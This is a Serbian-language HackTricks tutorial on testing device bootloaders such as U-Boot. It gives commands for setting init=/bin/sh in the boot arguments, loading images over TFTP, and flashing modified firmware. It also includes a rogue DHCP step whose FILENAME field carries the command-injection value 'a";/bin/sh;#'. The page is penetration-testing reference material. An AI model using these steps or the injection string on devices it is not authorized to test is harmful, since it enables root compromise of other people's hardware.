hacktricks/hardware-physical-access/firmware-analysis/bootloader-testing.md

4.6 KiB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %} {% endhint %}

Sledeći koraci se preporučuju za modifikaciju konfiguracija pokretanja uređaja i bootloader-a kao što je U-boot:

  1. Pristup Bootloader-ovom Interpreter Shell-u:
  • Tokom pokretanja, pritisnite "0", razmak ili druge identifikovane "magijske kodove" da biste pristupili bootloader-ovom interpreter shell-u.
  1. Modifikujte Boot Argumente:
  • Izvršite sledeće komande da dodate 'init=/bin/sh' boot argumentima, omogućavajući izvršavanje shell komande: %%% #printenv #setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash: rootfstype= hasEeprom=0 5srst=0 init=/bin/sh #saveenv #boot %%%
  1. Postavite TFTP Server:
  • Konfigurišite TFTP server za učitavanje slika preko lokalne mreže: %%% #setenv ipaddr 192.168.2.2 #lokalna IP adresa uređaja #setenv serverip 192.168.2.1 #IP adresa TFTP servera #saveenv #reset #ping 192.168.2.1 #proverite pristup mreži #tftp ${loadaddr} uImage-3.6.35 #loadaddr uzima adresu za učitavanje fajla i ime fajla slike na TFTP serveru %%%
  1. Iskoristite ubootwrite.py:
  • Koristite ubootwrite.py da napišete U-boot sliku i gurnete modifikovani firmware da biste dobili root pristup.
  1. Proverite Debug Funkcije:
  • Proverite da li su debug funkcije kao što su detaljno logovanje, učitavanje proizvoljnih kernela ili pokretanje sa nepouzdanih izvora omogućene.
  1. Opasna Hardverska Interferencija:
  • Budite oprezni prilikom povezivanja jednog pina na masu i interakcije sa SPI ili NAND flash čipovima tokom sekvence pokretanja uređaja, posebno pre nego što se kernel dekompresuje. Konsultujte se sa tehničkim listom NAND flash čipa pre nego što kratko spojite pinove.
  1. Konfigurišite Rogue DHCP Server:
  • Postavite rogue DHCP server sa zlonamernim parametrima koje uređaj može da prihvati tokom PXE pokretanja. Iskoristite alate kao što je Metasploit-ov (MSF) DHCP pomoćni server. Modifikujte 'FILENAME' parametar sa komandom za injekciju kao što je 'a";/bin/sh;#' da biste testirali validaciju unosa za procedure pokretanja uređaja.

Napomena: Koraci koji uključuju fizičku interakciju sa pinovima uređaja (*označeni zvezdicama) treba da se pristupaju sa ekstremnim oprezom kako bi se izbeglo oštećenje uređaja.

References

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% hint style="success" %} {% endhint %}